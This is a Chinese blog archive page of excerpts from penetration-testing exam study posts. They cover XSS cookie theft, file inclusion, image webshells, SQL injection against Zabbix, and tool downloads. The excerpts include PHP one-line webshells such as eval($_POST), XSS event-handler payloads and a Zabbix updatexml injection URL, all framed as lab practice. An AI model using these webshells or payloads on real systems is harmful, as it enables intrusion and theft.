06 2021 档案
摘要:考试也可能会遇到xss,很可惜也没有弄到xss的靶场,但是我们可以模拟出一个类似考场的环境,这里用了dvwa。 xss靶场里key最有可能在的位置就是cookie里。考试用到的工具NC。 首先找到转发工具的里nc.exe,双击后输入命令 nc -Lv -p 1111 监听1111端口 这里如果用小写
阅读全文
摘要:远程文件包含虽然没有弄到靶场,但是备考学习的时候不能不重视,毕竟谁也不知道,即将面临的考试碰到的是什么样的题型。可以参考下网上公开分享的资料。 题目是这样的: 不管啥url后面都给你加了个.txt,想到应该是用远程文件包含做 这里需要用到的知识就是利用python可以轻易在本地开一个服务器:如果有不
阅读全文
摘要:Python2 简单搭建Web服务器,只需在需要搭建Web服务器的目录(如 E:\tools)下,输入如下命令: python -m SimpleHTTPServer 8080 使用 8080端口的创建Web服务器 然后就可以在浏览器中输入 http://localhost:端口号/路径 Pytho
阅读全文
摘要:综合题目前只搞到一个靶场,一起来看看吧。。。 打开页面是这个样子的, 第一步:先来扫一下端口,爆破一下目录。 看来80端口是没有什么可搞得,再来看看8080端口。 8080端口是一个后台,还扫出了备份文件。 第二步:有了这个网站备份文件,当然要翻翻看,有没有什么账号密码什么的。 第三步:打开navi
阅读全文
摘要:靶场一: 第一个靶场的日志我是在excel中处理的,第一步先把所有的日志复制进excel里,按照固定宽度,先把IP和后面的内容分开。 第二步,按照要求筛选出所有172.16.12.12.的攻击IP 第三步,直接再对后面的内容进行分列,观察到所有状态码之前都有一个双引号,直接以双引号分列。得到下面内容
阅读全文
摘要:个人觉得这个命令注入是最简单的。 在这之前先来了解下读文件都可以用哪些命令吧。 linux常用于读取文件内容指令主要有以下七种: cat、tac、nl、more、less、head、tail cat: 由第一行开始显示内容,并将所有内容输出 cat 文件名 将文件内容显示在屏幕上 cat -n 文件
阅读全文
摘要:文件包含漏洞利用的前提: web 应用采用 include 等文件包含函数,并且需要包含的文件路径是通过用户传输参数的方式引入; 用户能够控制包含文件的参数,被包含的文件可被当前页面访问。 伪协议文件包含: file:// 访问本地文件系统 http(s):// 访问 HTTPs 网址 ftp://
阅读全文
摘要:靶场一 我们先来做一个图片马,图片马是指代码写入后不破坏图片为前提,图片仍可正常打开。 制作过程: 自定义一个新的文件夹,文件夹里放入三个文件。 一张自己喜欢的图片 自定义php代码文件 在当前路径下运行cmd ,并执行copy/b dog.jpg+1.txt dogtest.jpg 我们就用刚做好
阅读全文
摘要:BurpSuite2021.6 链接:https://pan.baidu.com/s/1JGmkj_yMfyATpT1rno85OA 提取码:1234 Dirsearch 链接:https://pan.baidu.com/s/1YJnFQtuBI_JEbESuRPeawg 提取码:qrsd 弱口令检
阅读全文
摘要:php的一句话木马: <?php phpinfo();?> <?php @eval($_POST['a']);?> <?php eval(@$_POST['a']); ?> <?php eval($_POST[a])?> <?php system($_REQUEST['cmd']);?> <?php
阅读全文
摘要:由于最近备战pte考试,花钱搞了两套靶场,可惜大题环境差点,前面几题废了好大力气才做出来,给大家分享下靶场思路。 首先,先总结一下考试的内容。题型分为选择题和实操题两部分。满分为100分,选择题有20道,共20分,主要考查一下安全方面的基础知识。 剩下的为80分的实操题,分为6个大题。 1.SQL注
阅读全文
摘要:32个触发事件XSS语句总结 1、onmouseenter:当鼠标进入选区执行代码 <div style="background-color:red" onmouseenter="alert('xss')">xss</div> 2、onmouseleave:当鼠标离开选区执行代码 <DIV onmo
阅读全文
摘要:scirpt标签用于定义客户端脚本,比如JavaScript <script>alert(1);</script> <script>alert("xss");</script> img标签定义HTML页面中的图像 <imgsrc=1onerror=alert(1);> <imgsrc=1onerro
阅读全文
摘要:etc/shadow: 文件的格式为: {用户名}:{加密后的口令密码}:{口令最后修改时间距原点(1970-1-1)的天数}:{口令最小修改间隔(防止修改口令,如果时限未到,将恢复至旧口令):{口令最大修改间隔}:{口令失效前的警告天数}:{账户不活动天数}:{账号失效天数}:{保留} 查看加密方
阅读全文
摘要:利用方法: 在url后面添加如下内容: jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatex
阅读全文
摘要:python3 Dirsearch.py -u https://www.xxx.com -e* 需要自定义字典的话 加参数 -w db/DIR.txt -u 指定网址 -e 指定网站语言 -w 指定字典 -r 递归目录(跑出目录后,继续跑目录下面的目录) --random-agents 使用随机UA
阅读全文
摘要:Linux中执行shell脚本的4种方法总结 bash shell 脚本的方法有多种,现在作个小结。假设我们编写好的shell脚本的文件名为hello.sh,文件位置在/data/shell目录中并已有执行权限。 方法一:切换到shell脚本所在的目录(此时,称为工作目录)执行shell脚本: cd
阅读全文
